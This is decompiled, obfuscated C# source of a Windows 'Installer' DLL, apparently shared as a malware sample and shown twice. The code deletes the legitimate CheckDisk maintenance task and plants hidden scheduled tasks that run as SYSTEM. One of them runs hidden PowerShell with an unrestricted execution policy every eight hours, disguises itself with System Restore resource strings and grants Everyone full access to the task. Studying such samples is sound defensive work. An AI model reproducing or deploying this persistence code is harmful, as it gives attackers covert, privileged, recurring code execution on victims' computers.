msuiche/Installer.dll

## Installer.dll
// Decompiled with JetBrains decompiler
// Type: Installer.Install
// Assembly: Installer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DF6A781-016A-4A47-9C62-874A888EB357
// Assembly location:

using \u0004;
using \u0006;
using Microsoft.Win32;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Principal;
using TaskScheduleHelper;

namespace Installer
{
  public class Install
  {
    private static string \u0001 = "\\Microsoft\\Windows\\Maintenance";
    private static string \u0002 = "SR                              ".TrimEnd();

    public Install()
    {
      this.\u0002();
      this.\u0003();
      this.\u0001();
    }

    private void \u0001()
    {
      try
      {
        Registry.LocalMachine.CreateSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Main").SetValue("DisableFirstRunCustomize", (object) 1);
      }
      catch (Exception ex)
      {
      }
    }

    private void \u0002()
    {
      try
      {
        Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\DRM\\").CreateSubKey("{cd704ff3-cd05-479e-acf7-6474908031dd}").SetValue((string) null, (object) DateTime.Now.ToBinary());
      }
      catch (Exception ex)
      {
      }
    }

    private void \u0003()
    {
      try
      {
        ITaskService taskService = \u0001.\u0001();
        taskService.Connect((object) null, (object) null, (object) null, (object) null);
        this.\u0001(taskService);
        this.\u0002(taskService);
        this.\u0003(taskService);
      }
      catch
      {
      }
    }

    private void \u0001([In] ITaskService obj0)
    {
      ITaskFolder folder = obj0.GetFolder("Microsoft\\Windows\\Maintenance");
      try
      {
        folder.DeleteTask("CheckDisk", 0);
      }
      catch
      {
      }
    }

    private void \u0002([In] ITaskService obj0)
    {
      ITaskFolder folder = obj0.GetFolder("\\Microsoft\\Windows\\Task Manager");
      try
      {
        IRegisteredTask registeredTask = (IRegisteredTask) null;
        try
        {
          registeredTask = folder.GetTask("System");
        }
        catch (FileNotFoundException ex)
        {
        }
        if (registeredTask != null)
          return;
        IRegisteredTask task = folder.GetTask("Interactive");
        ITaskDefinition pDefinition = obj0.NewTask(0U);
        pDefinition.Settings.AllowDemandStart = true;
        pDefinition.Settings.MultipleInstances = _TASK_INSTANCES_POLICY.TASK_INSTANCES_PARALLEL;
        pDefinition.Settings.DisallowStartIfOnBatteries = false;
        pDefinition.Settings.Hidden = true;
        pDefinition.Settings.Priority = 5;
        pDefinition.RegistrationInfo.Author = task.Definition.RegistrationInfo.Author;
        pDefinition.RegistrationInfo.Version = "1.0";
        pDefinition.RegistrationInfo.Source = task.Definition.RegistrationInfo.Source;
        pDefinition.RegistrationInfo.Description = task.Definition.RegistrationInfo.Description;
        IComHandlerAction comHandlerAction = (IComHandlerAction) pDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_COM_HANDLER);
        comHandlerAction.ClassId = "{855fec53-d2e4-4999-9e87-3414e9cf0ff4}";
        comHandlerAction.Data = "$(Arg0)";
        string str = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
        folder.RegisterTaskDefinition("System", pDefinition, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str);
      }
      catch
      {
      }
    }

    private string \u0001()
    {
      return "\"$tn='" + Install.\u0002 + "';$tf='" + Install.\u0001 + "';" + \u0001.\u0001() + "\"";
    }

    private string \u0002()
    {
      return Convert.ToBase64String(\u0001.\u0001());
    }

    private void \u0003([In] ITaskService obj0)
    {
      try
      {
        ITaskFolder folder = obj0.GetFolder(Install.\u0001);
        try
        {
          folder.DeleteTask(Install.\u0002, 0);
        }
        catch (Exception ex)
        {
        }
        ITaskDefinition taskDefinition = obj0.NewTask(0U);
        taskDefinition.RegistrationInfo.Author = "$(@%systemroot%\\system32\\srrstr.dll,-321)";
        taskDefinition.RegistrationInfo.Source = "$(@%systemroot%\\system32\\srrstr.dll,-320)";
        taskDefinition.RegistrationInfo.Description = "$(@%systemroot%\\system32\\srrstr.dll,-322)";
        taskDefinition.Settings.StartWhenAvailable = true;
        taskDefinition.Settings.RunOnlyIfNetworkAvailable = true;
        taskDefinition.Settings.StopIfGoingOnBatteries = false;
        taskDefinition.Settings.DisallowStartIfOnBatteries = false;
        taskDefinition.Settings.Hidden = true;
        NTAccount ntAccount = (NTAccount) new SecurityIdentifier(WellKnownSidType.LocalSystemSid, (SecurityIdentifier) null).Translate(typeof (NTAccount));
        taskDefinition.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST;
        taskDefinition.Principal.LogonType = _TASK_LOGON_TYPE.TASK_LOGON_GROUP;
        taskDefinition.Principal.GroupId = ntAccount.ToString();
        taskDefinition.Data = this.\u0002();
        IExecAction execAction = (IExecAction) taskDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
        execAction.Path = "powershell";
        execAction.Arguments = "-executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command " + this.\u0001();
        ITimeTrigger timeTrigger = (ITimeTrigger) taskDefinition.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME);
        timeTrigger.Repetition.Interval = "PT8H6M            ".TrimEnd();
        timeTrigger.Repetition.StopAtDurationEnd = false;
        timeTrigger.Enabled = true;
        string str1 = "2016-01-21T00:00:00.0000000         ".TrimEnd();
        timeTrigger.StartBoundary = !str1.Equals("0") ? str1 : DateTime.Now.ToString("o");
        string str2 = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
        string XmlText = taskDefinition.XmlText.Replace("Task version=\"1.2\"", "Task ");
        folder.RegisterTask(Install.\u0002, XmlText, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str2);
      }
      catch (Exception ex)
      {
      }
    }
  }
}
	// Decompiled with JetBrains decompiler
	// Type: Installer.Install
	// Assembly: Installer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
	// MVID: 1DF6A781-016A-4A47-9C62-874A888EB357
	// Assembly location:

	using \u0004;
	using \u0006;
	using Microsoft.Win32;
	using System;
	using System.IO;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
	using TaskScheduleHelper;

	namespace Installer
	{
	public class Install
	{
	private static string \u0001 = "\\Microsoft\\Windows\\Maintenance";
	private static string \u0002 = "SR ".TrimEnd();

	public Install()
	{
	this.\u0002();
	this.\u0003();
	this.\u0001();
	}

	private void \u0001()
	{
	try
	{
	Registry.LocalMachine.CreateSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Main").SetValue("DisableFirstRunCustomize", (object) 1);
	}
	catch (Exception ex)
	{
	}
	}

	private void \u0002()
	{
	try
	{
	Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\DRM\\").CreateSubKey("{cd704ff3-cd05-479e-acf7-6474908031dd}").SetValue((string) null, (object) DateTime.Now.ToBinary());
	}
	catch (Exception ex)
	{
	}
	}

	private void \u0003()
	{
	try
	{
	ITaskService taskService = \u0001.\u0001();
	taskService.Connect((object) null, (object) null, (object) null, (object) null);
	this.\u0001(taskService);
	this.\u0002(taskService);
	this.\u0003(taskService);
	}
	catch
	{
	}
	}

	private void \u0001([In] ITaskService obj0)
	{
	ITaskFolder folder = obj0.GetFolder("Microsoft\\Windows\\Maintenance");
	try
	{
	folder.DeleteTask("CheckDisk", 0);
	}
	catch
	{
	}
	}

	private void \u0002([In] ITaskService obj0)
	{
	ITaskFolder folder = obj0.GetFolder("\\Microsoft\\Windows\\Task Manager");
	try
	{
	IRegisteredTask registeredTask = (IRegisteredTask) null;
	try
	{
	registeredTask = folder.GetTask("System");
	}
	catch (FileNotFoundException ex)
	{
	}
	if (registeredTask != null)
	return;
	IRegisteredTask task = folder.GetTask("Interactive");
	ITaskDefinition pDefinition = obj0.NewTask(0U);
	pDefinition.Settings.AllowDemandStart = true;
	pDefinition.Settings.MultipleInstances = _TASK_INSTANCES_POLICY.TASK_INSTANCES_PARALLEL;
	pDefinition.Settings.DisallowStartIfOnBatteries = false;
	pDefinition.Settings.Hidden = true;
	pDefinition.Settings.Priority = 5;
	pDefinition.RegistrationInfo.Author = task.Definition.RegistrationInfo.Author;
	pDefinition.RegistrationInfo.Version = "1.0";
	pDefinition.RegistrationInfo.Source = task.Definition.RegistrationInfo.Source;
	pDefinition.RegistrationInfo.Description = task.Definition.RegistrationInfo.Description;
	IComHandlerAction comHandlerAction = (IComHandlerAction) pDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_COM_HANDLER);
	comHandlerAction.ClassId = "{855fec53-d2e4-4999-9e87-3414e9cf0ff4}";
	comHandlerAction.Data = "$(Arg0)";
	string str = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
	folder.RegisterTaskDefinition("System", pDefinition, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str);
	}
	catch
	{
	}
	}

	private string \u0001()
	{
	return "\"$tn='" + Install.\u0002 + "';$tf='" + Install.\u0001 + "';" + \u0001.\u0001() + "\"";
	}

	private string \u0002()
	{
	return Convert.ToBase64String(\u0001.\u0001());
	}

	private void \u0003([In] ITaskService obj0)
	{
	try
	{
	ITaskFolder folder = obj0.GetFolder(Install.\u0001);
	try
	{
	folder.DeleteTask(Install.\u0002, 0);
	}
	catch (Exception ex)
	{
	}
	ITaskDefinition taskDefinition = obj0.NewTask(0U);
	taskDefinition.RegistrationInfo.Author = "$(@%systemroot%\\system32\\srrstr.dll,-321)";
	taskDefinition.RegistrationInfo.Source = "$(@%systemroot%\\system32\\srrstr.dll,-320)";
	taskDefinition.RegistrationInfo.Description = "$(@%systemroot%\\system32\\srrstr.dll,-322)";
	taskDefinition.Settings.StartWhenAvailable = true;
	taskDefinition.Settings.RunOnlyIfNetworkAvailable = true;
	taskDefinition.Settings.StopIfGoingOnBatteries = false;
	taskDefinition.Settings.DisallowStartIfOnBatteries = false;
	taskDefinition.Settings.Hidden = true;
	NTAccount ntAccount = (NTAccount) new SecurityIdentifier(WellKnownSidType.LocalSystemSid, (SecurityIdentifier) null).Translate(typeof (NTAccount));
	taskDefinition.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST;
	taskDefinition.Principal.LogonType = _TASK_LOGON_TYPE.TASK_LOGON_GROUP;
	taskDefinition.Principal.GroupId = ntAccount.ToString();
	taskDefinition.Data = this.\u0002();
	IExecAction execAction = (IExecAction) taskDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
	execAction.Path = "powershell";
	execAction.Arguments = "-executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command " + this.\u0001();
	ITimeTrigger timeTrigger = (ITimeTrigger) taskDefinition.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME);
	timeTrigger.Repetition.Interval = "PT8H6M ".TrimEnd();
	timeTrigger.Repetition.StopAtDurationEnd = false;
	timeTrigger.Enabled = true;
	string str1 = "2016-01-21T00:00:00.0000000 ".TrimEnd();
	timeTrigger.StartBoundary = !str1.Equals("0") ? str1 : DateTime.Now.ToString("o");
	string str2 = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
	string XmlText = taskDefinition.XmlText.Replace("Task version=\"1.2\"", "Task ");
	folder.RegisterTask(Install.\u0002, XmlText, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str2);
	}
	catch (Exception ex)
	{
	}
	}
	}
	}